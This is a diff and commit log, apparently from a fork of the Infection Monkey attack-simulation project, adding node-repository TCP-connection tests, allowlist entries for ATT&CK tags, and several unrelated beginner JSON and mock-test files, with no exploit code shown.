            5: frozenset((CommunicationType.SCANNED, CommunicationType.EXPLOITED)),
        },
    ),
-    Node(
-        machine_id=4,
-        connections={},
-    ),
+    Node(machine_id=4, connections={}, tcp_connections=ALL_TCP_CONNECTIONS),
    Node(
        machine_id=5,
        connections={
@ -163,21 +171,6 @@ def test_upsert_communication__replace_one_fails(
        error_raising_node_repository.upsert_communication(1, 2, CommunicationType.SCANNED)


-def test_upsert_communication__replace_one_matched_without_modify(
-    error_raising_mock_mongo_client, error_raising_node_repository
-):
-    mock_result = MagicMock()
-    mock_result.matched_count = 1
-    mock_result.modified_count = 0
-    error_raising_mock_mongo_client.monkey_island.nodes.find_one = MagicMock(return_value=None)
-    error_raising_mock_mongo_client.monkey_island.nodes.replace_one = MagicMock(
-        return_value=mock_result
-    )
-
-    with pytest.raises(StorageError):
-        error_raising_node_repository.upsert_communication(1, 2, CommunicationType.SCANNED)
-
-
 def test_upsert_communication__replace_one_insert_fails(
    error_raising_mock_mongo_client, error_raising_node_repository
 ):
@ -216,3 +209,43 @@ def test_reset(node_repository):
 def test_reset__removal_error(error_raising_node_repository):
    with pytest.raises(RemovalError):
        error_raising_node_repository.reset()
+
+
+def test_upsert_tcp_connections__empty_connections(node_repository):
+    node_repository.upsert_tcp_connections(1, TCP_CONNECTION_PORT_22)
+    nodes = node_repository.get_nodes()
+    for node in nodes:
+        if node.machine_id == 1:
+            assert node.tcp_connections == TCP_CONNECTION_PORT_22
+
+
+def test_upsert_tcp_connections__upsert_new_port(node_repository):
+    node_repository.upsert_tcp_connections(2, TCP_CONNECTION_PORT_80)
+    nodes = node_repository.get_nodes()
+    modified_node = [node for node in nodes if node.machine_id == 2][0]
+    assert set(modified_node.tcp_connections) == set(ALL_TCP_CONNECTIONS)
+    assert len(modified_node.tcp_connections) == len(ALL_TCP_CONNECTIONS)
+
+
+def test_upsert_tcp_connections__port_already_present(node_repository):
+    node_repository.upsert_tcp_connections(4, TCP_CONNECTION_PORT_80)
+    nodes = node_repository.get_nodes()
+    modified_node = [node for node in nodes if node.machine_id == 4][0]
+    assert set(modified_node.tcp_connections) == set(ALL_TCP_CONNECTIONS)
+    assert len(modified_node.tcp_connections) == len(ALL_TCP_CONNECTIONS)
+
+
+def test_upsert_tcp_connections__node_missing(node_repository):
+    node_repository.upsert_tcp_connections(999, TCP_CONNECTION_PORT_80)
+    nodes = node_repository.get_nodes()
+    modified_node = [node for node in nodes if node.machine_id == 999][0]
+    assert set(modified_node.tcp_connections) == set(TCP_CONNECTION_PORT_80)
+
+
+def test_get_node_by_machine_id(node_repository):
+    assert node_repository.get_node_by_machine_id(1) == NODES[0]
+
+
+def test_get_node_by_machine_id__no_node(node_repository):
+    with pytest.raises(UnknownRecordError):
+        node_repository.get_node_by_machine_id(999)
--- a/13
+++ b/13
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/test_dumps.py
+++ b/test_dumps.py
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@ -9,10 +9,19 @@ from common.agent_configuration.agent_sub_configurations import (
 )
 from common.agent_events import ExploitationEvent, PingScanEvent, PropagationEvent, TCPScanEvent
 from common.credentials import Credentials, LMHash, NTHash
-from common.types import NetworkPort
+from common.tags import (
+    T1021_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+    T1222_ATTACK_TECHNIQUE_TAG,
+    T1570_ATTACK_TECHNIQUE_TAG,
+)
+from common.types import NetworkPort, NetworkService
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.log4shell_utils.ldap_server import LDAPServerFactory
-from monkey_island.cc.event_queue import IslandEventTopic, PyPubSubIslandEventQueue
-from monkey_island.cc.models import Report
+from monkey_island.cc.models import Machine, Node, Report
 from monkey_island.cc.models.networkmap import Arc, NetworkMap
 from monkey_island.cc.repository import MongoAgentRepository, MongoMachineRepository
 from monkey_island.cc.repository.attack.IMitigationsRepository import IMitigationsRepository
@ -318,6 +327,15 @@ TCPScanEvent.port_status
 # TODO: Remove once #2269 is close
 PropagationEvent
 ExploitationEvent
+T1021_ATTACK_TECHNIQUE_TAG
+T1105_ATTACK_TECHNIQUE_TAG
+T1110_ATTACK_TECHNIQUE_TAG
+T1203_ATTACK_TECHNIQUE_TAG
+T1210_ATTACK_TECHNIQUE_TAG
+T1222_ATTACK_TECHNIQUE_TAG
+T1570_ATTACK_TECHNIQUE_TAG
+HostExploiter._publish_propagation_event
+HostExploiter._publish_exploitation_event

 # pydantic base models
 underscore_attrs_are_private
@ -336,3 +354,10 @@ SCANNED
 EXPLOITED
 CC
 CC_TUNNEL
+
+# TODO remove when 2267 is done
+NetworkServiceNameEnum.UNKNOWN
+Machine.network_services
+Machine.config.json_dumps
+Machine._socketaddress_from_string
+Node.tcp_connections
--- a/zmtest04/test_mock.py
+++ b/zmtest04/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
--- a/副本/test_mock.py
+++ b/副本/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
--- a/zmtest05/test_mock.py
+++ b/zmtest05/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
Author	SHA1	Message	Date
p15670423	f803f88afc	确认合并测试，，，，，，，，，，，，，，，，，，	2022-10-11 09:55:06 +08:00
p34709852	09b3b42dc5	ADD file via upload	2022-10-10 14:48:05 +08:00
p31829507	de18b55417	Add test_dumps.py	2022-10-10 14:39:32 +08:00
p31829507	9071fc90aa	Add test_dumps	2022-10-10 14:38:31 +08:00
wutao	4505399049	测试：重复提交代码	2022-10-10 13:40:54 +08:00
wutao	f5bfdc430c	测试：提交代码	2022-10-10 13:36:32 +08:00
wutao	0382831701	测试：提交代码	2022-10-10 13:34:44 +08:00
Mike Salvatore	04fec93c39	Merge branch '2269-publish-events-from-hadoop-exploiter' into develop PR #2396	2022-10-07 09:37:37 -04:00
Ilija Lazoroski	7a664218bd	Agent: Check all potential urls in Hadoop	2022-10-07 15:13:04 +02:00
Mike Salvatore	6d60e33c1e	Merge branch '2269-publish-events-for-mssql-exploiter' into develop PR #2401	2022-10-07 08:46:40 -04:00
Mike Salvatore	a558948c5d	Agent: Remove unnecessary `pass` from MSSQLExploiter	2022-10-07 08:43:05 -04:00
Mike Salvatore	66f5d7a86a	Agent: Remove errant exploitation event from hadoop If no potential URLs are found, then no exploit is attempted, so there's no reason to publish an ExploitationEvent.	2022-10-07 08:35:24 -04:00
Shreya Malviya	3b225a9c7d	Merge pull request #2376 from guardicore/dependabot/npm_and_yarn/monkey/monkey_island/cc/ui/d3-color-and-d3-3.1.0 Bump d3-color and d3 in /monkey/monkey_island/cc/ui	2022-10-07 18:01:53 +05:30
Mike Salvatore	79e8ce5f79	Island: Pass tuple, not set to upsert_tcp_connections() pydantic can probably handle the set -> tuple conversion itself, but mypy complains.	2022-10-07 07:44:49 -04:00
Mike Salvatore	0965b97d45	Island: Use ScanEvent for typehint in ScanEventHandler `event` gets passed to `_get_source_machine()`, which expects `ScanEvent`, not `AbstractAgentEvent`	2022-10-07 07:43:50 -04:00
Mike Salvatore	4c026241ea	Island: Change method order in ScanEventHandler	2022-10-07 07:41:50 -04:00
Ilija Lazoroski	25073be9f3	Agent: Remove adding vulnerable urls in Hadoop Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	c02d43556a	Agent: Make Hadoop tags uppercase	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	8bdb30dcfb	Agent: Rename stamp to timestamp in Hadoop	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	8f6df12d9c	Agent: Modify HadoopExploiter tags to be properties	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	76a3cb0ba0	Agent: Stamp time before exploit executes	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	de5d365bb0	Agent: Publish events sooner	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	3e592cfa69	Agent: Use exploiter tag properties	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	4a0a24dde2	Agent: Update hadoop exploiter tags T1570 -> T1105	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	76ae57281d	Agent: Use EXPLOIT_TAGS for exploitation event	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	54b551b728	Agent: Update tags for hadoop events	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	c31aed94ea	Agent: Move successful explotiation event publish	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	bee1047024	Agent: Update hadoop failed event publishing	2022-10-07 11:46:34 +02:00
Kekoa Kaaikala	57af640317	Agent: Use correct publish method names	2022-10-07 11:46:34 +02:00
Ilija Lazoroski	9c185a3a78	Agent: Add tags and error messages in Hadoop	2022-10-07 11:46:34 +02:00
Ilija Lazoroski	fe864792f3	Agent: Publish Propagation and Exploitation events from Hadoop	2022-10-07 11:46:34 +02:00
VakarisZ	4709ae771b	Merge pull request #2400 from guardicore/2267-add-tcp-connections 2267 add tcp connections	2022-10-07 12:15:39 +03:00
vakarisz	be4ecccdcd	Island: Refactor get_node_by_id to raise UnknownRecordError	2022-10-07 10:05:06 +03:00
Mike Salvatore	77d37bdb21	Merge branch '2269-publish-events-from-log4shell-exploiter' into develop PR #2397	2022-10-06 17:26:06 -04:00
Mike Salvatore	9c2cdf15e2	Agent: Add TODO in Log4ShellExploiter	2022-10-06 17:01:06 -04:00
Mike Salvatore	ead979c6ca	Agent: Add T1110 to Log4Shell exploiter tags	2022-10-06 16:54:02 -04:00
Mike Salvatore	03c6c5ea4b	Agent: Remove unnecessary Path -> str in Log4ShellExploiter	2022-10-06 16:51:14 -04:00
Mike Salvatore	eac3076828	Agent: Change typehint for build_monkey_commandline's location The function can handle str, PurePath, or None. This typehint change reflects that capability	2022-10-06 16:50:41 -04:00
Mike Salvatore	7bc9993c6f	Agent: Reduce VICTIM_WAIT_SLEEP_TIME_SEC to 0.050 seconds 1 second is a long time to wait, and we want our event timestamps to be more accurate. 0.050 is 10 x sys.getswitchinterval(). It's reasonably accurate but will also share the CPU nicely.	2022-10-06 16:46:41 -04:00
Mike Salvatore	6bd7042444	Agent: Add VICTIM_WAIT_SLEEP_TIME_SEC constant in log4shell exlpoiter	2022-10-06 16:42:33 -04:00
Mike Salvatore	d8fca72f28	Agent: Publish all prop/exploit events from _wait_for_victim()	2022-10-06 16:41:20 -04:00
Mike Salvatore	b2c5b22128	Merge branch '2269-publish-events-from-powershell-exploiter' into develop PR #2402	2022-10-06 12:45:13 -04:00
Mike Salvatore	8e3bf96589	Agent: Convert plaintext to str() get_plaintext() can return bytes. Convert the output to a str in PowershellClient to avoid potential issues.	2022-10-06 12:40:50 -04:00
Mike Salvatore	65dd386603	Agent: Collect timestamp before powershell connect	2022-10-06 12:39:37 -04:00
Mike Salvatore	c4573673ce	Agent: Rename timestamp -> execute_agent_timestamp	2022-10-06 12:39:11 -04:00
Ilija Lazoroski	ac11d159fe	Agent: Revise Powershell publishing of events	2022-10-06 16:03:15 +02:00
Mike Salvatore	de9b5601d8	Merge branch 2269-publish-events-from-sshexec-exploiter into develop PR #2395	2022-10-06 10:00:35 -04:00
Mike Salvatore	c980bfd915	Agent: Move timestamp closer to ssh.exec_command()	2022-10-06 09:57:11 -04:00
Mike Salvatore	52380a2513	Agent: Publish exploitation event on unexpected SSH exception	2022-10-06 09:55:53 -04:00
Mike Salvatore	39bada5bb1	Agent: Move assignment outside of try/except	2022-10-06 15:50:46 +02:00
Kekoa Kaaikala	3bca02af59	Agent: Fix powershell tests	2022-10-06 15:50:46 +02:00
Kekoa Kaaikala	7d535c72d9	Agent: Publish powershell exploitation events	2022-10-06 15:50:46 +02:00
Kekoa Kaaikala	3bede2f9d1	Agent: Publish propagation events	2022-10-06 15:50:46 +02:00
Kekoa Kaaikala	bb6716df18	Common: Add attack technique T1059	2022-10-06 15:50:46 +02:00
vakarisz	8503e0f499	UT: Remove unused test data structures	2022-10-06 15:02:13 +03:00
Ilija Lazoroski	ec617df06a	Agent: Fix LocketHTTPServer mypy error in MSSQLExploiter	2022-10-06 13:53:17 +02:00
vakarisz	0d246a0479	Island: Rename add_tcp_connections to upsert_tcp_connections	2022-10-06 14:49:11 +03:00
Ilija Lazoroski	47846628e6	Agent: Modify MSSQL tags to be properties	2022-10-06 13:47:11 +02:00
vakarisz	3bc2e4876f	Island: Handle missing node in add_tcp_connections	2022-10-06 14:45:56 +03:00
Kekoa Kaaikala	15974ff21c	Agent: Stamp time before running exploit	2022-10-06 13:37:26 +02:00
Kekoa Kaaikala	66f8471f24	Agent: Remove "summary" event	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	e404416363	Agent: Use exploit tag properties	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	5c6b1e3910	Common: Remove unused technique T1071	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	9269c8579c	Agent: Remove unneccessary technique	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	8317c03686	Agent: Add tags to MSSQL propagation events	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	aab965bad7	Common: Add attack technique T1071	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	fa8b721abe	Common: Add attack technique T1059	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	183bd1145f	Agent: Add tags to MSSQL exploitation events	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	33230e85f7	Agent: Use updated publish methods	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	2cd9d0086b	Agent: Fix mypy error in http_tools.py	2022-10-06 13:35:18 +02:00
Kekoa Kaaikala	8dd196122b	Agent: Publish events from MSSQLExploiter	2022-10-06 13:35:18 +02:00
vakarisz	b0ec035909	Island: Move tcp_connection addition to node repository	2022-10-06 14:31:12 +03:00
Ilija Lazoroski	0f3f45e92f	Agent: Modify Log4Shell tags to be properties	2022-10-06 13:26:48 +02:00
Kekoa Kaaikala	016bf5c795	Agent: Stamp times before the exploit runs	2022-10-06 13:24:03 +02:00
Kekoa Kaaikala	48e6e95271	Agent: Update propagation tags for log4shell	2022-10-06 13:22:38 +02:00
Kekoa Kaaikala	ac69064dec	Agent: Send failed exploitation event	2022-10-06 13:22:38 +02:00
Kekoa Kaaikala	0c4b90beb5	Agent: Fix typo	2022-10-06 13:22:38 +02:00
Ilija Lazoroski	c5d5418af4	Agent: Fix typo in t1203 attack technique in Log4Shell	2022-10-06 13:22:38 +02:00
Ilija Lazoroski	ef4a465515	Agent: Add tags to exploitation and propagation events in Log4Shell	2022-10-06 13:22:38 +02:00
Ilija Lazoroski	c5506f98e8	Agent: Publish Propagation and Exploitation events from Log4Shell	2022-10-06 13:22:38 +02:00
vakarisz	c90044074d	Island: Remove storage error when node wasn't modified Upserting should throw an error when updating or inserting went wrong, not when a node is already up to date.	2022-10-06 14:21:13 +03:00
Ilija Lazoroski	95f1e3cb7b	Agent: Modify tags methods to be properties in SSHExploiter	2022-10-06 13:16:49 +02:00
Ilija Lazoroski	dcb08b2881	Agent: Convert IPv4Address to str when connecting to socket	2022-10-06 13:15:42 +02:00
Ilija Lazoroski	f0112410c9	Agent: Rename stamp to timestamp in SSHExploiter	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	e11bd2c7f2	Agent: Stamp start time prior to running exploit	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	aba886624e	Agent: Send propagation events sooner	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	e8f48085a4	Agent: Use the tag properties	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	79f72dda55	Agent: Stop sending PropagationEvent before attempt	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	72378f4e53	Agent: Publish scan event when checking ssh port	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	431d6ae775	Agent: Extract method _get_ssh_port	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	0a1901b9a1	Agent: Use error to propagate failure	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	a2534391a6	Agent: Extract method _propagate	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	1cb88e029a	Agent: Extract method _exploit	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	b31eb885f0	Agent: Extract method _get_victim_os	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	dc8a0ac2ad	Agent: Extract method _upload_agent_binary	2022-10-06 13:15:42 +02:00
Kekoa Kaaikala	9dac64b60e	Agent: Update ssh exploiter tags	2022-10-06 13:15:42 +02:00
Ilija Lazoroski	5d9416c385	Agent: Use common.tags to publish events in SSHExploiter	2022-10-06 13:15:42 +02:00
Ilija Lazoroski	5948537d4a	Agent: Add tags to SSHExploiter	2022-10-06 13:15:42 +02:00
Ilija Lazoroski	ddaada1f09	Agent: Revise event publishing in SSHExploiter	2022-10-06 13:15:42 +02:00
vakarisz	2248bdcd67	Island: Add _get_node_by_id method to mongo_node_repository.py	2022-10-06 14:10:47 +03:00
Shreya Malviya	e2453e481c	Agent: Rename variables in HostExploiter	2022-10-06 16:38:42 +05:30
Kekoa Kaaikala	254b4e1c6c	Agent: Update publish methods to accept timestamp	2022-10-05 19:43:25 +00:00
Kekoa Kaaikala	12e9aaf42e	Agent: Add abstract properties for exploiter tags	2022-10-05 17:32:48 +00:00
Kekoa Kaaikala	95b1d9c62d	Agent: Remove target from publish methods	2022-10-05 15:57:15 +00:00
vakarisz	249950d602	Island: Improve tcp handler code and coverage	2022-10-05 17:07:19 +03:00
vakarisz	6c913895c5	Island: Add TCP connections to nodes based on TCP scan event	2022-10-05 15:33:16 +03:00
vakarisz	bbcdc1bef4	Island: Make upsert_node method public Updating/inserting the node into the repository is required outside of repository itself.	2022-10-05 15:33:11 +03:00
Mike Salvatore	73a8c14397	Merge branch '2269-add-attack-technique-tags' into develop PR #2394	2022-10-05 08:25:51 -04:00
Ilija Lazoroski	63f869d296	Project: Add common.tags and HostExploiter publish functions to Vulture	2022-10-05 14:21:23 +02:00
Mike Salvatore	82217b4094	Merge branch 2267-add-network-services into develop PR #2398	2022-10-05 08:20:13 -04:00
Mike Salvatore	10e3c97489	Island: Use Tuple[SocketAddress] for tcp_connections There are serialization issues when using FrozenSet because pydantic converts the SocketAddress to a dict, which is not hashable. There are probably ways to work around this, but it's not worth the effort at thsi time. If performance becomes an issue (doubtful) we can revisit using a frozenset instead.	2022-10-05 14:51:31 +03:00
Mike Salvatore	8799a60f47	Island: Fix serialization/deserialization of Machine.network_services	2022-10-05 14:51:30 +03:00
Mike Salvatore	d8cf5d33dd	Common: Extract MutableInfectionMonkeyModelConfig	2022-10-05 14:51:30 +03:00
Mike Salvatore	eb3daf84f1	Common: Use strings for NetworkService Enum values	2022-10-05 14:51:30 +03:00
Mike Salvatore	f6ed8a997c	Common: Rename NetworkServiceNameEnum -> NetworkService "Name" and "Enum" are redundant in this case	2022-10-05 14:51:25 +03:00
vakarisz	8bf1d1f46f	Island, Common: Add services to machine.py	2022-10-05 14:51:01 +03:00
vakarisz	a390c97b70	Island: Add tcp_connections to node	2022-10-05 14:50:02 +03:00
vakarisz	80a095b657	Agent: Use NetworkPort instead of Port	2022-10-05 14:50:02 +03:00
Ilija Lazoroski	2ece91b9df	Agent: Rename event_queue to agent_event_queue in SSHCredentialCollector	2022-10-05 11:37:58 +02:00
Ilija Lazoroski	c7e2b91735	Agent: Rename event_queue to agent_event_queue in MimikatzCredentialCollector	2022-10-05 11:34:50 +02:00
Ilija Lazoroski	19fcf8d053	Agent: Import attack technique tags from common in MimikatzCollector	2022-10-05 11:30:09 +02:00
Ilija Lazoroski	c8aee645fa	Agent: Import attack technique tags from common in SSHCollector	2022-10-05 11:24:52 +02:00
Ilija Lazoroski	491612f9e8	Common: Add T1005 and T1145 attack technique tags	2022-10-05 11:21:28 +02:00
Ilija Lazoroski	0ed167fb48	Agent: Import attack technique tags from common in Zerologon	2022-10-05 11:13:39 +02:00
Ilija Lazoroski	e46bb8964d	Common: Add T1003 and T1098 attack technique tags	2022-10-05 11:11:18 +02:00
Mike Salvatore	fd8ea53e8b	Merge branch '2269-remove-find_monkeys_in_db' into develop PR #2391	2022-10-04 18:21:00 -04:00
Mike Salvatore	bbbb1ac773	Island: Remove disused LogBlackboxEndpoint	2022-10-04 16:30:13 -04:00
Mike Salvatore	6ae7676322	BB: Pass generator instead of list comprehension to all() This will allow a short-circuit.	2022-10-04 16:30:13 -04:00
Mike Salvatore	b713cce893	Island: Remove /api/test/monkey endpoint	2022-10-04 16:30:13 -04:00
Kekoa Kaaikala	2bea619786	BB: Removed unused method and endpoint	2022-10-04 16:30:13 -04:00
Kekoa Kaaikala	e0c9717da9	BB: Update test_compabitiblity to use new api	2022-10-04 16:30:13 -04:00
Kekoa Kaaikala	73fbc22e3d	BB: Remove find_monkeys_in_db	2022-10-04 16:30:13 -04:00
Mike Salvatore	a691a16625	Merge pull request #2393 from guardicore/2269-update-hostexploiter 2269 update hostexploiter	2022-10-04 15:34:08 -04:00
Mike Salvatore	3172433410	Agent: Swap order of _publish_{propagation,exploitation}_event() Putting _publish_exploitation_event() first puts the methods in both alphabetical and chronological order.	2022-10-04 15:20:14 -04:00
Mike Salvatore	8e6a098a2e	Project: Add HostExploiter methods to vulture_allowlist.py	2022-10-04 15:18:12 -04:00
Kekoa Kaaikala	a07eadce60	Common: Add T1570 attack technique	2022-10-04 18:00:41 +00:00
Kekoa Kaaikala	d1a8ce2082	Common: Add T1210 tag	2022-10-04 17:58:33 +00:00
Kekoa Kaaikala	6a100105be	Common: Order attack tags alphanumerically	2022-10-04 17:58:23 +00:00
Ilija Lazoroski	8b4af5c349	Common: Fix typo in attack tags	2022-10-04 17:57:57 +00:00
Ilija Lazoroski	dd35bebb3e	Common: Add T1203 attack technique tag	2022-10-04 17:57:16 +00:00
Ilija Lazoroski	bb11ea7857	Common: Add attack tags	2022-10-04 17:56:49 +00:00
Kekoa Kaaikala	ee77eddaab	Agent: Fix tuple type hint	2022-10-04 17:50:39 +00:00
Kekoa Kaaikala	116ae90f3d	UT: Remove host exploiter tests	2022-10-04 17:45:30 +00:00
Kekoa Kaaikala	b94002a984	Agent: Make publish methods private	2022-10-04 17:44:37 +00:00
Ilija Lazoroski	8e161f0fd9	Agent: Accept tuple as tags to HostExploiter publish events methods	2022-10-04 17:36:27 +00:00
Ilija Lazoroski	95b3556cd0	Agent: Exploiter name when publishing events to be __class__.__name__	2022-10-04 17:36:05 +00:00
Kekoa Kaaikala	a79d40b42e	UT: Fix powershell tests	2022-10-04 17:35:33 +00:00
Kekoa Kaaikala	3e86766aaf	Agent: Use default value for exploiter name	2022-10-04 17:35:05 +00:00
Ilija Lazoroski	0b72e4ef9a	Agent: Add publish methods to HostExploiter	2022-10-04 17:34:41 +00:00
Ilija Lazoroski	bf4fecf464	Agent: Rename event_queue to agent_event_queue in HostExploiter	2022-10-04 17:34:31 +00:00
Mike Salvatore	4ace93e417	Merge branch 'consolidate-agent-event-handlers' into develop PR #2390	2022-10-03 15:19:16 -04:00
Mike Salvatore	adee0b4063	Agent: Move add_credentials_from_event to agent_event_handlers package	2022-10-03 14:47:03 -04:00
Mike Salvatore	37b884a5b8	Agent: Move agent_event_forwarder.py to agent_event_handlers package	2022-10-03 14:47:03 -04:00
Mike Salvatore	a3ce870b64	Merge pull request #2389 from guardicore/2269-notify-relay-on-propagation 2269 notify relay on propagation	2022-10-03 14:46:14 -04:00
Mike Salvatore	399fedfba5	UT: Rename test_relay_not_notified_if_none	2022-10-03 14:45:44 -04:00
Kekoa Kaaikala	57b4ec4117	BB: Refactor agent communication check Updated CommunicationAnalyzer to use the /api/agents and /api/machines endpoints to determine whether or not an agent communicated back to the island. Resolves PR #2388	2022-10-03 14:28:22 -04:00
Mike Salvatore	a8383f4a79	Agent: Add docstrings to notify_relay_on_propagation	2022-10-03 13:25:30 -04:00
Mike Salvatore	d3ff56138f	Agent: Remove disused ExploitInterceptingTelemetryMessenger	2022-10-03 13:15:55 -04:00
Mike Salvatore	2ad972548b	Agent: Remove ExploitInterceptingTelemetryMessenger decoration	2022-10-03 13:15:55 -04:00
Mike Salvatore	fb7d62e318	Agent: Subscribe notify_relay_on_propagation to PropagationEvent events	2022-10-03 13:15:55 -04:00
Mike Salvatore	0466eb7239	Agent: Add notify_relay_on_propagation agent event handler	2022-10-03 13:15:55 -04:00
Mike Salvatore	368ddde20f	Common: Register serializers for {Exploitation,Propagation}Event	2022-10-03 13:15:12 -04:00
dependabot[bot]	21656dabb4	Bump d3-color and d3 in /monkey/monkey_island/cc/ui Bumps [d3-color](https://github.com/d3/d3-color) to 3.1.0 and updates ancestor dependency [d3](https://github.com/d3/d3). These dependencies need to be updated together. Updates `d3-color` from 1.4.1 to 3.1.0 - [Release notes](https://github.com/d3/d3-color/releases) - [Commits](https://github.com/d3/d3-color/compare/v1.4.1...v3.1.0) Updates `d3` from 5.16.0 to 7.6.1 - [Release notes](https://github.com/d3/d3/releases) - [Changelog](https://github.com/d3/d3/blob/main/CHANGES.md) - [Commits](https://github.com/d3/d3/compare/v5.16.0...v7.6.1) --- updated-dependencies: - dependency-name: d3-color dependency-type: indirect - dependency-name: d3 dependency-type: direct:production ... Signed-off-by: dependabot[bot] <support@github.com>	2022-09-30 01:20:57 +00:00